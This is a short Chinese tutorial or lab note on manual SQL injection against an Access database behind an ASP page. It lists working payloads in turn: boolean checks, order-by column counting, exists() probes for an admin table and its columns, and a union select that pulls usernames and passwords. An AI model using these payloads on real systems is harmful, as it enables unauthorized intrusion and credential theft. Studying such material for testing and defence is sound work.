Access数据库的SQL手工注入,用联合语句显示可显字段时,必须要“from 表名”。
/new_list.asp?id=1 and 1=1访问成功;/new_list.asp?id=2 and 1=2访问失败。
order by x,x=1、2、3、4时成功,5、6时失败。
/new_list.asp?id=2 order by 4;
and exists(select count(*) from admin),页面返回正常,说明存在admin表。
image.png
id,username,passwd或者password
id=1 and exists(select id from admin) //页面返回正常,说明存在id列 id=1 and exists(select username from admin) //页面返回正常,说明存在username列 id=1 and exists(select passwd from admin) //页面返回正常,说明存在passwd列
/new_list.asp?id= 1%20 union select 1,username,passwd,4 from admin